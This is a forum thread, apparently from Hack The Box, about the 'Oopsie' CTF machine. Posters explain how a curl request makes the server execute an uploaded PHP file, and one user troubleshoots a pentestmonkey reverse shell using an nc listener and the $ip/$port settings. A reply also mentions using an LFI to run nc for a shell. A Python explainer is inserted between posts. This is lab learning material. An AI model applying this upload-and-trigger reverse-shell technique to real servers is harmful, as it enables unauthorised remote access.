What does curl do in triggering a reverse shell in Oopsie

In the Starting Point Oopsie machine, a "curl http://10.10.10.28/uploads/???.php" is executed to trigger a reverse shell. I do not understand what curl does in this command. Does it force the server to run the php file???! Can anyone explain this?

Comments

  • Curl makes a request to the server. In this instance it requests ???.php.

    You could get the same outcome by visiting http://10.10.10.28/uploads/???.php in a browser.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • But why should the file be executed? Isn't it supposed to be something like an image? Why should the server run it?

  • @leihyunzhang said:

    > But why should the file be executed?

    Well, that depends on what the file is.

    PHP is a server-side scripting language. If your server supports it, the code it contains is executed and the output returned to the user agent that requested it.

    Same with things like JSP.

    If you request a plain HTML file, nothing is executed as the file isn't processed - however there are exceptions such as embedded javascript and SSI, but this makes it a bit more complex.

    > Isn't it supposed to be something like an image? Why should the server run it?

    Well, if it is an image the server won't run it - but having a .php extension means it is likely that the server will attempt to pre-process it before rendering its output. This obviously depends on how the server is configured but for a starting point CTF, I would assume that if it says it processes PHP, it processes PHP.

    TazWake

  • edited October 8

    If you were to go into your terminal and type

    /bin/python3
    

    It would open the python interpreter. Likewise, going to /uploads/???.php would execute your shell. You are making calls to the file in both instances, just one is being done remotely.

    That's kind of a simple explanation. Taz alludes to reasons files will not execute, but it gives you the gist of it.

    Really what I am getting at is that a file can be called from a filepath, if that is what you mean.

    LMAY75
    Always happy to help, DM me if you need anything!

  • @LMAY75 said:

    > If you were to go into your terminal and type
    >
    >     /bin/python3
    >
    > It would open the python interpreter. Likewise, going to /uploads/???.php would execute your shell. You are making calls to the file in both instances, just one is being done remotely.
    >
    > That's kind of a simple explanation. Taz alludes to reasons files will not execute, but it gives you the gist of it.
    >
    > Really what I am getting at is that a webserver is no different than your machine or mine. The only change is port 80 is exposed.

    I don't think this is a correct explanation. When we put something in the address bar and press go, a GET request is sent. The server then handles it and returns the answer. It's not a command execution per se. It may, e.g., be a REST address without any corresponding files for it. What I expect is that what is under the uploads folder is just downloaded without considering what type it is. But it seems that the server runs it if it is a php file. I assume that it is a misconfiguration of the server.

  • edited October 8

    @leihyunzhang said:

    > @LMAY75 said:
    >
    > > If you were to go into your terminal and type
    > >
    > >     /bin/python3
    > >
    > > It would open the python interpreter. Likewise, going to /uploads/???.php would execute your shell. You are making calls to the file in both instances, just one is being done remotely.
    > >
    > > That's kind of a simple explanation. Taz alludes to reasons files will not execute, but it gives you the gist of it.
    > >
    > > Really what I am getting at is that a webserver is no different than your machine or mine. The only change is port 80 is exposed.
    >
    > I don't think this is a correct explanation. When we put something in the address bar and press go, a GET request is sent. The server then handles it and returns the answer. It's not a command execution per se. It may, e.g., be a REST address without any corresponding files for it. What I expect is that what is under the uploads folder is just downloaded without considering what type it is. But it seems that the server runs it if it is a php file. I assume that it is a misconfiguration of the server.

    As I said, it is a gross oversimplification of what happens; however, for a visual example it provides a good enough representation at a basic level.

    It would also depend on what is being called. Sometimes through directory traversal it is possible to interact with executables directly.

    But yes, for a php file the execution is handled by php on the server. However, that is not a misconfiguration; php is behaving exactly as it should.

    LMAY75

  • @leihyunzhang said:

    > I don't think this is a correct explanation. When we put something in the address bar and press go, a GET request is sent. The server then handles it and returns the answer. It's not a command execution per se.

    I agree with this clarification.

    > It may, e.g., be a REST address without any corresponding files for it. What I expect is that what is under the uploads folder is just downloaded without considering what type it is.

    "Downloaded" is a simplification. It is pre-processed, where the server takes the PHP bits and evaluates them, adding the output to the data returned as part of the HTTP response packets.

    > But it seems that the server runs it if it is a php file. I assume that it is a misconfiguration of the server.

    Yeah I agree with @LMAY75 here. It would be unusual for a server to not process a PHP file before returning data, if it has been configured to process PHP.

    PHP, JSP, SSI (normally SHTML), ASP and a few other extensions are processed (or pre-processed) on the server before any data is returned to the client (browser, curl, wget, powershell, whatever).

    Files which use client-side execution (javascript etc) act slightly differently.

    If you request a PHP page and view source on the response, you are almost never going to see the actual PHP code. If you request a page with embedded JS, you can see the embeds and view the JS itself.

    Where it gets a bit muddy is if the server-side code contains a misconfiguration. Then you can have situations where the remote server code is triggering executable code on the filesystem. This is getting a bit away from the original question.

    At a basic level, curl is just a way of interacting with a server - there are many you can pick from.

    TazWake
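To make the point above concrete, here is an added illustration (not code from the Oopsie machine or from any poster in this thread) modelling what curl actually sends and how a server decides whether a requested file is sent raw or handed to the script engine. The document root, the handler table and the `uploads_no_exec` switch are all constructed for the example; the hardened branch models an upload directory with PHP turned off (as with Apache's `php_admin_flag engine off` for that directory).

```python
"""Model of how a web server treats a GET request for a file under /uploads.

Added illustration for this thread, not code from the Oopsie machine or any
forum poster. The document root, the handler table and the uploads_no_exec
switch are all constructed for the example.
"""
import posixpath
from urllib.parse import urlsplit

# Constructed document root: URL path -> file bytes. The .php file only echoes
# a string; it stands in for any script dropped into an upload directory.
DOCROOT = {
    "/index.html": b"<html><body>hello</body></html>",
    "/uploads/photo.jpg": b"\xff\xd8\xff\xe0JFIF-bytes",
    "/uploads/note.php": b"<?php echo 'uploaded'; ?>",
}

# Extensions the server hands to a script engine instead of sending raw.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".jsp"}


def request_line(url):
    """What curl (or a browser) actually sends: a plain HTTP GET, nothing more."""
    parts = urlsplit(url)
    return f"GET {parts.path or '/'} HTTP/1.1\r\nHost: {parts.netloc}\r\n\r\n"


def dispatch(url, docroot=DOCROOT, uploads_no_exec=False):
    """Return (action, path) for a request.

    'execute'   -> file is passed to the script engine and its output is sent
    'static'    -> file bytes are sent unchanged (the 'download' the OP expected)
    'not_found' -> 404
    uploads_no_exec models a hardened config where the script engine is turned
    off for /uploads (e.g. Apache 'php_admin_flag engine off' in that directory).
    """
    path = posixpath.normpath(urlsplit(url).path)  # collapses /uploads/../x
    if path not in docroot:
        return ("not_found", path)
    ext = posixpath.splitext(path)[1].lower()
    if ext not in SCRIPT_EXTENSIONS:
        return ("static", path)
    if uploads_no_exec and path.startswith("/uploads/"):
        return ("static", path)  # served raw, so it is never executed
    return ("execute", path)
```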

  • edited October 8
    > @TazWake said:

    > Where it gets a bit muddy is if the server-side code contains a misconfiguration. Then you can have situations where the remote server code is triggering executable code on the filesystem. This getting a bit away from the original question.

    After rereading everything I do agree that I gave a bad example. I originally interpreted his question as having more to do with the idea that scripts/programs/etc. can be called from a filepath.

    LMAY75

  • @LMAY75 said:

    > After rereading everything I do agree that I gave a bad example. I originally interpreted his question as having more to do with the idea that scripts/programs/etc. can be called from a filepath.

    Yeah - which curl is really good at as well :smile:

    A good example of making this confusing is using curl to trigger an LFI in a webserver which executes nc to get a shell.

    TazWake

  • edited October 8

    @TazWake said:

    > @LMAY75 said:
    >
    > > After rereading everything I do agree that I gave a bad example. I originally interpreted his question as having more to do with the idea that scripts/programs/etc. can be called from a filepath.
    >
    > Yeah - which curl is really good at as well :smile:
    >
    > A good example of making this confusing is using curl to trigger an LFI in a webserver which executes nc to get a shell.

    Exactly, sorry to OP if I confused ya.

    LMAY75

  • 'Curl' - Client URL. Simply put, we can call it a command-line browser. We can use curl in the CLI just like the browser in the GUI.

    Hope this helps. :)

    A Chemist doing Penetration Testing - Check the Story here: BinaryBiceps

  • @LMAY75 said:

    > @TazWake said:
    >
    > > @LMAY75 said:
    > >
    > > > After rereading everything I do agree that I gave a bad example. I originally interpreted his question as having more to do with the idea that scripts/programs/etc. can be called from a filepath.
    > >
    > > Yeah - which curl is really good at as well :smile:
    > >
    > > A good example of making this confusing is using curl to trigger an LFI in a webserver which executes nc to get a shell.
    >
    > Exactly, sorry to OP if I confused ya.

    No problem! :smile: Thanks everyone for the information.

  • edited November 15

    Can't get the reverse shell.

    curl http://10.10.10.28/uploads/phpsizifshell2.php
    WARNING: Failed to daemonise. This is quite common and not fatal.
    Connection refused (111)

    And

    nc -lvnp 1234
    listening on [any] 1234 ...

    File uploaded with changes in
    $ip =
    $port =
    I can see it in dirsearch:
    python3 dirsearch.py -u http://10.10.10.28/uploads -e php -w worldlist.txt

    [14:21:57] Starting:
    [14:21:58] 200 - 92B - /uploads/phpsizifshell2.php

    UFW DISABLE

    IPTABLES:
    Chain INPUT(policy ACCEPT)
    ACCEPT tcp -- anywhere anywhere tcp dpt:http
    Chain FORWARD (policy ACCEPT)
    Chain OUTPUT (policy ACCEPT)

    NMAP:
    PORT STATE SERVICE
    1234/tcp open hotline

    NETSTAT:
    Proto  Recv-Q  Send-Q  Local Address  Foreign Address  State   PID/Program
    tcp    0       0       0.0.0.0:1234   0.0.0.0:*        LISTEN  5727/nc

    My experience is not enough to understand where the problem is or what mistake I made.
    I tried to turn off the proxy in Firefox but it didn't change anything.
    Updating the VPN settings also did not give changes.

    !!! I would be grateful for a push in the right direction. !!!

  • So I assume you've used the pentestmonkey PHP reverse shell.

    The most probable cause of problems with this script is that the values for IP and port aren't correct.

    $ip = '127.0.0.1'; // CHANGE THIS
    $port = 1234; // CHANGE THIS

    Double-check the IP is the one you've been assigned by HTB (often found as tun0 but probably best confirmed on the access page). I'd also advise using a different port to reduce conflicting with other people who haven't bothered changing it.

    If the IP is correct then it could simply be down to a misconfiguration on the server.

    The error you've got is down to this if statement:
    if (function_exists('pcntl_fork')) {}

    So it appears that the function doesn't exist. It shouldn't break the shell.

    TazWake

  • @TazWake said:

    > So I assume you've used the pentestmonkey PHP reverse shell.
    >
    > The most probable cause of problems with this script is that the values for IP and port aren't correct.
    >
    >     $ip = '127.0.0.1'; // CHANGE THIS
    >     $port = 1234; // CHANGE THIS
    >
    > Double-check the IP is the one you've been assigned by HTB (often found as tun0 but probably best confirmed on the access page). I'd also advise using a different port to reduce conflicting with other people who haven't bothered changing it.
    >
    > If the IP is correct then it could simply be down to a misconfiguration on the server.
    >
    > The error you've got is down to this if statement:
    >
    >     if (function_exists('pcntl_fork')) {}
    >
    > So it appears that the function doesn't exist. It shouldn't break the shell.

    I should have said that I tried playing with different port numbers before asking for help. I tried commenting out some of the code in the reverse shell .php file which is responsible for starting daemonization; then the answer is simply
    "Connection refused (111)"
    I think the problem is with the sending command
    "curl http://10.10.10.28/uploads/my_file_name.php" from my machine to the server,
    or a server problem.
    I will try to do this operation from PWNBox.
    If all is OK, the problem is with my machine;
    if I get the server answer Connection refused (111), the problem is on the server side,
    isn't it?

  • edited November 16

    The problem was on my machine.
    What helped:
    1) Restart Linux
    2) apt update, apt upgrade
    3) Restart Linux
    4) iptables -F
    Then the same actions as before led to the connection with the server on the first try.
    I took the flags.
    THANKS FOR PARTICIPATING !!!
